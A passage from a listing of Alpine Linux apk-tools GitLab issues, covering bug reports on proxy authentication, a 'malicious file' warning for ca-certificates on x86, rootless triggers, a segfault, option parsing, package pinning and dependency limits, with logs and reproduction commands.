1. `docker run --rm -p 3128:3128 --volume $PWD/squid.conf:/etc/squid/squid.conf --volume $PWD/logs:/var/log/squid/ sameersbn/squid`
Terminal 2:
1. `tail -f logs/access.log`
Terminal 3:
1. `docker run --rm -it alpine`
1. `export http_proxy=http://alpine:xxx@172.17.0.1:3128`
1. `export https_proxy=http://alpine:xxx@172.17.0.1:3128`
1. `apk add --no-cache curl` -> fails
1. `sed -i 's/https/http/g' /etc/apk/repositories`
1. `apk add --no-cache curl` -> works
1. `curl https://dl-cdn.alpinelinux.org/alpine/v3.13/main/x86_64/APKINDEX.tar.gz -I`
## Logs
failing request because no authentication to the proxy is provided:
```shell
proxy:
1615899619.390 0 172.17.0.1 TCP_DENIED/407 3981 CONNECT dl-cdn.alpinelinux.org:443 - HIER_NONE/- text/html
alpine:
fetch https://dl-cdn.alpinelinux.org/alpine/v3.13/main/x86_64/APKINDEX.tar.gz
WARNING: Ignoring https://dl-cdn.alpinelinux.org/alpine/v3.13/main: Permission denied
fetch https://dl-cdn.alpinelinux.org/alpine/v3.13/community/x86_64/APKINDEX.tar.gz
WARNING: Ignoring https://dl-cdn.alpinelinux.org/alpine/v3.13/community: Permission denied
```
working request when using http
```shell
proxy:
1615899677.349 260 172.17.0.1 TCP_MISS/200 631652 GET http://dl-cdn.alpinelinux.org/alpine/v3.13/main/x86_64/APKINDEX.tar.gz alpine HIER_DIRECT/151.101.114.133 application/octet-stream
alpine:
fetch http://dl-cdn.alpinelinux.org/alpine/v3.13/main/x86_64/APKINDEX.tar.gz
fetch http://dl-cdn.alpinelinux.org/alpine/v3.13/community/x86_64/APKINDEX.tar.gz
```
example with curl to demonstrate that the requested url is available via https
```shell
HTTP/1.1 200 Connection established
HTTP/2 200
server: nginx
content-type: application/octet-stream
last-modified: Tue, 16 Mar 2021 10:59:20 GMT
etag: "60508f88-9a0ed"
strict-transport-security: max-age=31536000
x-frame-options: DENY
x-content-type-options: nosniff
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Tue, 16 Mar 2021 13:10:25 GMT
age: 3
x-served-by: cache-lga21962-LGA, cache-hhn4059-HHN
x-cache: HIT, HIT
x-cache-hits: 2, 2
x-timer: S1615900225.337001,VS0,VE0
content-length: 631021
```

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10737
"ignoring malicious file" error from apk when trying to install ca-certificates-20191127-r5 for x86 from edge (other arches work) (2021-04-11T11:27:51Z, Oliver Smith)

With the just released upgrade to apk-tools
currently it is not possible to install `ca-certificates` for `x86`. It works fine for x86_64, aarch64, armhf, armv7.
```
# apk add ca-certificates
(1/1) Installing ca-certificates (20191127-r5)
WARNING: ca-certificates-20191127-r5: ignoring malicious file usr/share/ca-certificates/mozilla/NetLock_Arany_=Class_Gold=_Főtanúsítvány.crt
Executing busybox-1.33.0-r1.trigger
Executing ca-certificates-20191127-r5.trigger
1 error; 9 MiB in 21 packages
```
One way to reproduce: `pmbootstrap -q chroot -bx86 -- apk add ca-certificates`
Files:
* x86: [ca-certificates-20191127-r5_1_.apk](/uploads/6677b71d4cc428a5aa7822712d6d2928/ca-certificates-20191127-r5_1_.apk)
* x86_64: [ca-certificates-20191127-r5.apk](/uploads/06bcccf09e92737f517ebad7c6b412b5/ca-certificates-20191127-r5.apk)
* aarch64: [ca-certificates-20191127-r5_2_.apk](/uploads/ad7c8fa89703b8796e0b7b7a3078c24e/ca-certificates-20191127-r5_2_.apk)
CC: @fabled
Side note: it's a bit confusing that apk says WARNING, then fails with error.

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10736
Triggers fail to execute when operating in rootless/--no-chown mode (2021-04-11T11:27:51Z, Akash Satheesan)

I was experimenting with using Alpine/apk-tools as a basis for an immutable, rootless container engine's rootfs; using a tool like `bwrap` with `bwrap --bind ./alpine-rootfs / --ro-bind /etc/resolv.conf /etc/resolv.conf --dev /dev --proc /proc --unshare-pid --unshare-ipc --unshare-uts /bin/ash` for example, one can run a "rootless" Alpine container. The goal is to not have any files in the rootfs owned by uid 0/root, because that would mean rootless rootfs cleanup would become difficult.
However, when executing triggers, apk expects to be running as uid 0, and attempts to `chroot` into the target rootfs, irrespective of the fact that the active rootfs is being targeted - see https://gitlab.alpinelinux.org/alpine/apk-tools/-/blob/master/src/database.c#L1909.
I'm not sure what would be the ideal way to remove this dependency on chroot - I considered a `snprintf(fd_pathbuf, sizeof(fd_pathbuf), "/proc/self/fd/%d", fd); readlink(fd_pathbuf, fd_path, sizeof(fd_path));` and then `strcmp(fd_path, "/")` but I am not sure if there is a better solution, or an alternate approach worth taking.

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10735
"No error information" when installing packages built on edge/3.13 (2021-01-24T20:41:21Z, Rasmus Thomsen)

See e.g. https://gitlab.alpinelinux.org/alpine/aports/-/issues/12296#note_137729
Seems to be reproducible on all systems. At least the error message should be better imho.

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10734
Alpine 3.13: Segmentation fault on installing cifs-utils (2021-04-11T11:27:50Z, sga-mevis)

I run the following command in an Alpine 3.13 Docker image:
`apk add --update cifs-utils`
Result:
```
fetch https://dl-cdn.alpinelinux.org/alpine/v3.13/main/x86_64/APKINDEX.tar.gz
fetch https://dl-cdn.alpinelinux.org/alpine/v3.13/community/x86_64/APKINDEX.tar.gz
(1/18) Installing libcap (2.46-r0)
(2/18) Installing keyutils-libs (1.6.3-r0)
(3/18) Installing krb5-conf (1.0-r2)
(4/18) Installing libcom_err (1.45.6-r1)
(5/18) Installing libverto (0.3.1-r1)
(6/18) Installing krb5-libs (1.18.3-r1)
(7/18) Installing talloc (2.3.1-r0)
24% ############################
Segmentation fault
```
I've gone back to Alpine 3.12.3 where this still worked.

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10733
apk info does not recognise -I parameter, only the longer --rinstall-if (2021-01-17T13:04:33Z, Gábor ADORJÁNI)

Environment: Alpine 3.13, apk-tools-2.12.0-r4
Example, I guess it is self-explanatory:
```
# apk info -I lxc
apk: unrecognized option: I
apk-tools 2.12.0, compiled for x86_64.
usage: apk info [<OPTIONS>...] PACKAGES...
or: apk info -W FILE
Description:
apk info prints information known about the listed packages. By default, it
prints the description, webpage, and installed size of the package
(equivalent to apk info -dws).
Global options:
-f, --force Enable selected --force-* options (deprecated)
-i, --interactive Ask confirmation before performing certain
operations
-p, --root <ROOT> Manage file system at ROOT
-q, --quiet Print less information
-U, --update-cache Alias for '--cache-max-age 1'
-v, --verbose Print more information (can be specified twice)
-V, --version Print program version and exit
-X, --repository <REPO>
Specify additional package repository
--allow-untrusted Install packages with untrusted signature or no
signature
--arch ARCH Temporarily override architecture, to be combined
with --root
--cache-dir CACHEDIR Temporarily override the cache directory
--cache-max-age AGE Maximum AGE (in minutes) for index in cache before
it's refreshed
--force-binary-stdout
Continue even if binary data will be printed to the
terminal
--force-broken-world Continue even if WORLD cannot be satisfied
--force-non-repository
Continue even if packages may be lost on reboot
--force-old-apk Continue even if packages use unsupported features
--force-overwrite Overwrite files in other packages
--force-refresh Do not use cached files (local or from proxy)
--keys-dir KEYSDIR Override directory of trusted keys
--no-cache Do not use any local cache path
--no-network Do not use the network
--no-progress Disable progress bar even for TTYs
--print-arch Print default arch and exit
--progress Show progress
--progress-fd FD Write progress to the specified file descriptor
--purge Delete modified configuration files on package
removal and uninstalled packages from cache on cache
clean
--repositories-file REPOFILE
Override system repositories, see repositories
--wait TIME Wait for TIME seconds to get an exclusive repository
lock before failing
Info options:
-a, --all List all information known about the package
-d, --description Print the package description
-e, --installed Check package installed status
-L, --contents List files included in the package
-i, --install-if List the package's install_if rule
-I, --rinstall-if List other packages whose install_if rules refer to
this package
-r, --rdepends List reverse dependencies of the package (all other
packages which depend on the package)
-R, --depends List the dependencies of the package
-s, --size Print the package's installed size
-w, --webpage Print the URL for the package's upstream webpage
-W, --who-owns Print the package which owns the specified file
--license Print the package SPDX license identifier
--replaces List the other packages for which this package is
marked as a replacement
--triggers Print active triggers for the package
For more information: man 8 apk-info
# apk info --rinstall-if lxc
lxc-4.0.6-r1 affects auto-installation of:
lxc-lvm-4.0.6-r1
lxc-openrc-4.0.6-r1
lxc-doc-4.0.6-r1
#
```

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10732
apk policy: add feature to hold/pin packages
2022-12-21T19:37:22Z
J0WI

I'd like to prevent apk from installing or upgrading specific packages.
Use cases are preventing apk from overriding custom builds or preventing a specific broken update while others keep updating.
v3.1

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10731
Failed to add a package if there are too many dependencies
2021-01-25T15:38:52Z
Thibault Ferrante

When a package has too many dependencies (in my example >=755), `apk add` fails with a non-explicit error message.
This can be reproduced with docker like this:
- Create an [APKBUILD](/uploads/6a80b53da00bf3d8a098cfe915f716b6/APKBUILD) and put it in its dedicated folder (test-f)
- Docker command `docker run --rm -it -v "$(pwd):/workdir" -w /workdir alpine:3.12 /bin/sh`
- Generation and triggering of the bug
```
apk add abuild
abuild-keygen -a -n -q
( cd test-f/ && abuild -Fr )
apk add darkhttpd
darkhttpd /root/packages &
apk info --allow-untrusted -X http://127.0.0.1/workdir/ --repositories-file /dev/null test-f
apk update --allow-untrusted -X http://127.0.0.1/workdir/ --repositories-file /dev/null test-f
apk add --allow-untrusted -X http://127.0.0.1/workdir/ --repositories-file /dev/null test-f
```
This triggers this message:
```
/workdir/test-f # apk add --allow-untrusted -X http://127.0.0.1/workdir/ --repositories-file /dev/null test-f
ERROR: unsatisfiable constraints:
test (missing):
required by: test-f-1.0-r0[test]
```

https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10730
installation of octave does not work
2020-12-29T12:21:02Z
Ernst Reißner

This is not a bug on apk but seemingly a problem with the package.
Trying
```
apk add octave --repository http://dl-cdn.alpinelinux.org/alpine/edge/testing
```
fails with
```
ERROR: unsatisfiable constraints:
so:libhdf5.so.200 (missing):
required by: octave-6.1.0-r3[so:libhdf5.so.200]
so:libqhull.so.8.0 (missing):
required by: octave-6.1.0-r3[so:libqhull.so.8.0]
```
Shall these packages be in testing also??